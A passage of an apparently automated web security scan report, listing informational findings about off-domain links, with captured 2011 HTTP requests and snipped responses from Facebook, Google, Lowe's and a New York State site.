<a data-user-id="16834046" href="/#!/CARE" title="CAREUSA (care.org)"><img src="http://a2.twimg.com/profile_images/1237784101/care_logo_normal.JPG" alt="CAREUSA (care.org)" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14939981" href="/#!/questlove" title="Questo of The Roots"><img src="http://a0.twimg.com/profile_images/1168342829/Screen_shot_2010-11-15_at_9.08.26_PM_normal.png" alt="Questo of The Roots" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="3475" href="/#!/davemorin" title="Dave Morin"><img src="http://a0.twimg.com/profile_images/1386049513/Screenshot_2011-06-07_at_11.49.55_AM_normal.png" alt="Dave Morin" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="53153263" href="/#!/tyrabanks" title="Tyra Banks"><img src="http://a2.twimg.com/profile_images/1380913332/TB_White_Jacket_normal.JPG" alt="Tyra Banks" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="18479513" href="/#!/MLB" title="MLB"><img src="http://a0.twimg.com/profile_images/1437975427/ASG_twitter_icon_normal.jpg" alt="MLB" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="25087685" href="/#!/WomensHealthMag" title="Women's Health Mag"><img src="http://a1.twimg.com/profile_images/1417379062/WomensHealthJulyAug11_normal.jpg" alt="Women's Health Mag" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="16817883" href="/#!/scifri" title="Science Friday"><img src="http://a0.twimg.com/profile_images/543636661/SciFriBadge73_normal.png" alt="Science Friday" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="10697882" href="/#!/robhoward" title="Rob Howard"><img src="http://a3.twimg.com/profile_images/456912196/Picture_1_normal.png" alt="Rob Howard" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="23922282" href="/#!/dannymasterson" title="danny masterson"><img src="http://a1.twimg.com/profile_images/665883933/gallery-msg-126445197571-3_2_normal.jpg" alt="danny masterson" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14353392" href="/#!/NoReservations" title="Anthony Bourdain"><img src="http://a2.twimg.com/profile_images/1289898062/image_normal.jpg" alt="Anthony Bourdain" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="12101862" href="/#!/VirginAmerica" title="Virgin America"><img src="http://a2.twimg.com/profile_images/1339309616/100x100-transparent-tailfin-v2_normal.gif" alt="Virgin America" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="18713254" href="/#!/simonpegg" title="Simon Pegg"><img src="http://a0.twimg.com/profile_images/1334758081/Rolling_Stone_08.02.11_0057_normal.jpg" alt="Simon Pegg" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="16303106" href="/#!/StephenAtHome" title="Stephen Colbert"><img src="http://a3.twimg.com/profile_images/568525297/Picture_normal.png" alt="Stephen Colbert" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="18552281" href="/#!/netsbasketball" title="netsbasketball"><img src="http://a0.twimg.com/profile_images/1325337735/icon_normal.png" alt="netsbasketball" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14437914" href="/#!/NewsHour" title="NewsHour"><img src="http://a0.twimg.com/profile_images/1160001056/logo_normal.jpg" alt="NewsHour" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14363353" href="/#!/travelchannel" title="TravelChannel"><img src="http://a1.twimg.com/profile_images/1237858543/TC_twitter_profile_pic_copy_normal.png" alt="TravelChannel" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="16298447" href="/#!/MITMuseum" title="MIT Museum"><img src="http://a3.twimg.com/profile_images/1090941746/KismetatMITMuseum_normal.jpg" alt="MIT Museum" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="22061737" href="/#!/AiANews" title="Art in America"><img src="http://a3.twimg.com/profile_images/86820236/TwitterLogo_normal.jpg" alt="Art in America" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="17174309" href="/#!/diplo" title="d..p..o"><img src="http://a0.twimg.com/profile_images/1376696406/diplo_fallin_normal.jpg" alt="d..p..o" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="18170896" href="/#!/sanjayguptaCNN" title="Dr. Sanjay Gupta"><img src="http://a3.twimg.com/profile_images/192122918/profile_pic_normal.jpg" alt="Dr. Sanjay Gupta" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14515734" href="/#!/drdrew" title="Dr. Drew"><img src="http://a1.twimg.com/profile_images/458966890/twitterProfilePhoto_normal.jpg" alt="Dr. Drew" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="21898041" href="/#!/Disc_Health" title="Discovery Health"><img src="http://a3.twimg.com/profile_images/1241243134/DFH_logo_twitter_normal.JPG" alt="Discovery Health" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="17596014" href="/#!/flwbooks" title="Flashlight Worthy"><img src="http://a0.twimg.com/profile_images/104775516/flwbooks100x100_normal.png" alt="Flashlight Worthy" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="7713202" href="/#!/SpeakerBoehner" title="Speaker John Boehner"><img src="http://a0.twimg.com/profile_images/1207063871/2010-06-11-at-10-26-58-twitter1_normal.jpg" alt="Speaker John Boehner" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="15316815" href="/#!/sarahdessen" title="sarahdessen"><img src="http://a1.twimg.com/profile_images/1282997489/WhatHappenedtoGoodbyesmall_normal.jpg" alt="sarahdessen" height="48" width="48" /></a>
...[SNIP]...

12.11. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/delaware-gov/id444422872
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.4.47
X-Cnection: close
Date: Wed, 13 Jul 2011 01:59:39 GMT
Content-Length: 7946

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Content-Language" content="en" /><script>Cavalr
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/sdwD1rGJXK2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/rK9hU7iYtfp.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/OWWAkKnpuow.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/AppStore" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23301_286893159420_2873_q.jpg" alt="App Store" /></a>
...[SNIP]...

12.12. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/delaware-gov/id444422872
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.252.73
X-Cnection: close
Date: Wed, 13 Jul 2011 01:59:39 GMT
Content-Length: 7938

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Content-Language" content="en" /><script>Cavalr
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/sdwD1rGJXK2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/rK9hU7iYtfp.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/OWWAkKnpuow.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/iTunes" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276877_100484820802_650394_q.jpg" alt="iTunes" /></a>
...[SNIP]...

12.13. http://www.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /maps

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /maps?f=q&source=s_q&hl=en&geocode=&q=488+State+Road,+Suite+1+Plymouth,+MA+02360&sll=37.0625,-95.677068&sspn=51.708931,74.267578&ie=UTF8&hq=&hnear=488+State+Rd,+Plymouth,+Massachusetts+02360&ll=42.208176,-70.883789&spn=1.017206,1.213989&z=8&output=embed HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.bi2technologies.com/contact-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=G8GXu_mu_V4v5YxE2RqVYl3gQcYLRg30PTyN25cOw1cLTLBKpupiwM_D9n2e3-VyC48S_mOn73wfajzGDfFiwn12C9Ufm9LtLqm9u-FMzXndz4J5LJqChVjL88zMCKHU

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Date: Wed, 13 Jul 2011 11:37:46 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
Content-Length: 153919
X-XSS-Protection: 1; mode=block

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...
<a class="kd-button print-button left small" title="Print" jsaction="print.show" href="javascript:void(0);" id="print"> <img class="print" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a> <a class="kd-button email-button mid small" title="Send" jsaction="stx.show" href="javascript:void(0);" id="showsendtox"> <img class="send" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a> <a class="kd-button permalink-button right small" title="Link" jsaction="link.show" href="javascript:void(0);" id="link"> <img class="link" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<button class="kd-button kd-button-submit" title="Search Maps" type="submit" id="q-sub" name="btnG" tabindex="2"> <img class="search-white" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </button>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/smc.png"/> <div class="smcpanup" id="pan_up_inline" jsaction="smc.selectPanUp">
...[SNIP]...
</div> <img class="hide-msie-6 logo" src="http://maps.gstatic.com/mapfiles/poweredby.png"/> </a>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
sName: 'kd-button' + ($count &gt; 1 ? lt($index, 1) ? ' left' : gt($index, $count - 2) ? ' right' : ' mid' : '');" class="kd-button" href="javascript:void(0)" tabindex="3" jsaction="tm.click"> <img jsattrs="className: 'dir-tm-' + $this" class="dir-tm-d" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<a class="kd-button" id="dir_rev" href="javascript:void(0)"> <img class="dir-reverse" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div class="icon " log="" jsaction="app.openInfoWindow" jsprops="markerid:'A'" jstrack="ioMdToz9EKHozQXy2IzFBw" ved=0CAkQ_gswAA id="marker_A_1"><img alt="A" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconA"/></div>
...[SNIP]...

12.14. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=soris HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=G8GXu_mu_V4v5YxE2RqVYl3gQcYLRg30PTyN25cOw1cLTLBKpupiwM_D9n2e3-VyC48S_mOn73wfajzGDfFiwn12C9Ufm9LtLqm9u-FMzXndz4J5LJqChVjL88zMCKHU

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:39:22 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 90444

<!doctype html> <head> <title>soris - Google Search</title> <script>window.google={kEI:"6oMdTpWED4jGgAfVlrTUCQ",kEXPI:"17259,23756,24692,24878,24879,27400,28505,28936,29702,29859,30316,30465,31
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=soris&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://dragonage.wikia.com/wiki/Soris" class=l onmousedown="return clk(this.href,'','','','1','','0CBgQFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:ZQPJaxF6dCEJ:dragonage.wikia.com/wiki/Soris+soris&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB0QIDAA')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://dragonage.wikia.com/wiki/Soris#Involvement" onmousedown="return clk(this.href,'','','','1','','0CB8Q0gIoADAA')">Involvement</a> - <a href="http://dragonage.wikia.com/wiki/Soris#Strategy" onmousedown="return clk(this.href,'','','','1','','0CCAQ0gIoATAA')">Strategy</a> - <a href="http://dragonage.wikia.com/wiki/Soris#Epilogue" onmousedown="return clk(this.href,'','','','1','','0CCEQ0gIoAjAA')">Epilogue</a> - <a href="http://dragonage.wikia.com/wiki/Soris#Bugs" onmousedown="return clk(this.href,'','','','1','','0CCIQ0gIoAzAA')">Bugs</a>
...[SNIP]...
<h3 class="r"><a href="http://www.soris.org/" class=l onmousedown="return clk(this.href,'','','','2','','0CCQQFjAB')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:zk0W3EE4Aq4J:www.soris.org/+soris&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCkQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://soris.us/" class=l onmousedown="return clk(this.href,'','','','3','','0CCsQFjAC')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Hpnxu0viENQJ:soris.us/+soris&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDAQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=23339880" class=l onmousedown="return clk(this.href,'','','','4','','0CDIQFjAD')"><em>
...[SNIP]...
<h3 class="r"><a href="http://acronyms.thefreedictionary.com/SORIS" class=l onmousedown="return clk(this.href,'','','','5','','0CDgQFjAE')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:7LOeZZJ_2DgJ:acronyms.thefreedictionary.com/SORIS+soris&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CD0QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.uesp.net/wiki/Oblivion:Soris_Arenim" class=l onmousedown="return clk(this.href,'','','','6','','0CD4QFjAF')">Oblivion:<em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:vLfn1CgGnNwJ:www.uesp.net/wiki/Oblivion:Soris_Arenim+soris&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEMQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.soris.torino.it/" class=l onmousedown="return clk(this.href,'','','','7','','0CEUQFjAG')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:1H132Wn0iAsJ:www.soris.torino.it/+soris&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEoQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bobbiesoris.com/" class=l onmousedown="return clk(this.href,'','','','8','','0CE4QFjAH')">Bobbie <em>
...[SNIP]...
<h3 class="r"><a href="http://www.tripadvisor.com/Hotel_Review-g285731-d2076935-Reviews-Casa_Eloida_Soris_Vera-Trinidad_Cuba.html" class=l onmousedown="return clk(this.href,'','','','9','','0CFMQFjAI')">Casa Eloida <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:_BUa3ZEPqH0J:www.tripadvisor.com/Hotel_Review-g285731-d2076935-Reviews-Casa_Eloida_Soris_Vera-Trinidad_Cuba.html+soris&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFkQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/people/Ashanthi-Soris/654121635" class=l onmousedown="return clk(this.href,'','','','10','','0CFoQFjAJ')">Ashanthi <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:dZBOFwuZ5AMJ:www.facebook.com/people/Ashanthi-Soris/654121635+soris&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CF8QIDAJ')">Cached</a>
...[SNIP]...

12.15. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /webapp/wcs/stores/servlet/LogonForm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63497
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Wed, 13-Jul-2011 02:33:05 GMT
Set-Cookie: TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; Path=/
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<li><a name="FOOTER_2_BBB" href="https://www.bbb.org/online/consumer/cks.aspx?ID=1080715144129" onclick="window.open('https://www.bbb.org/online/consumer/cks.aspx?ID=1080715144129'); return false;"><img src="/images/icon-bbb.jpg" alt="" />
...[SNIP]...

12.16. http://www.nysegov.com/citGuide.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nysegov.com
Path:   /citGuide.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /citGuide.cfm?superCat=102&cat=449&content=main HTTP/1.1
Host: www.nysegov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:50:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

               <html lang="en-US">
               <head>
                   <title>New York State | Citizen Guide</title>
                   
                   <link rel="STYLESHEET" type
...[SNIP]...
<div style="height: 28px; background-color: #003366;border:#999 1px solid;width:754px;margin:0 auto; clear:both;text-align:center">
    <a href="http://www.ny.gov"><img style="float: left; border:none;" src="nysbannerpics/banner_img1.png" alt="NY.gov Portal" />
...[SNIP]...
<br />
   <a href="http://www.ny.gov/howdoi/index.html" onmouseup="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmousedown="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmouseover="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmouseout="quickChange(menuItem14a,'images/pg2slice_18a.gif')"><img id="menuItem14a" src="images/pg2slice_18a.gif" height="19" width="188" alt="How Do I?" border="0" />
...[SNIP]...
</a>    
                               
                                   (<a href="http://www.omh.state.ny.us/omhweb/index_sp.html" title="Spanish version: Link to the NYS Office of Mental Health.">En Espa&ntilde;ol</a>
...[SNIP]...
</a>    
                               
                                   (<a href="http://www.cvb.state.ny.us/Espanol.aspx" title="Spanish version: Eligibility guidelines and allowable reimbursement expenses">En Espa&ntilde;ol</a>
...[SNIP]...
<td align="right" colspan="2" class="bottomgrid" style="color:#DEDEDC" valign="bottom">
               <a href="http://www.ny.gov" title="NYS Home Page" style="text-decoration:none;"><img src="frameparts/nyshome.gif" alt="NYS Home Page" width="79" height="6" align="bottom" style="border:none;">
...[SNIP]...
</a>
               |
               <a href="http://www.ny.gov/contactus/index.html" title="Contact Us"><img src="frameparts/contactus.gif" alt="Contact Us" width="62" height="6" align="bottom" style="border:none;"></a>
               |
               <a href="http://www.ny.gov/privacy/index.html" title="Privacy Policy"><img src="frameparts/privacypolicy.gif" width="79" height="6" align="bottom" alt="Privacy Policy" style="border:none;"></a>
               |
               <a href="http://www.ny.gov/disclaimer/index.html" title="Disclaimer"><img src="frameparts/disclaimer.gif" width="57" height="6" alt="Disclaimer" align="bottom" style="border:none;">
...[SNIP]...

12.17. http://www.nysegov.com/citguide.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nysegov.com
Path:   /citguide.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /citguide.cfm?context=citguide&content=munibyalpha HTTP/1.1
Host: www.nysegov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:50:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

               <html lang="en-US">
               <head>
                   <title>New York State | Citizen Guide</title>
                   
                   <link rel="STYLESHEET" type
...[SNIP]...
<div style="height: 28px; background-color: #003366;border:#999 1px solid;width:754px;margin:0 auto; clear:both;text-align:center">
    <a href="http://www.ny.gov"><img style="float: left; border:none;" src="nysbannerpics/banner_img1.png" alt="NY.gov Portal" />
...[SNIP]...
<br />
   <a href="http://www.ny.gov/howdoi/index.html" onmouseup="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmousedown="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmouseover="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmouseout="quickChange(menuItem14a,'images/pg2slice_18a.gif')"><img id="menuItem14a" src="images/pg2slice_18a.gif" height="19" width="188" alt="How Do I?" border="0" />
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.airmont.org" title="Visit Village of Airmont Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.rockland.ny.us/" title="Rockland County website">Rockland County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.erie.gov/akron" title="Visit Village of Akron Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
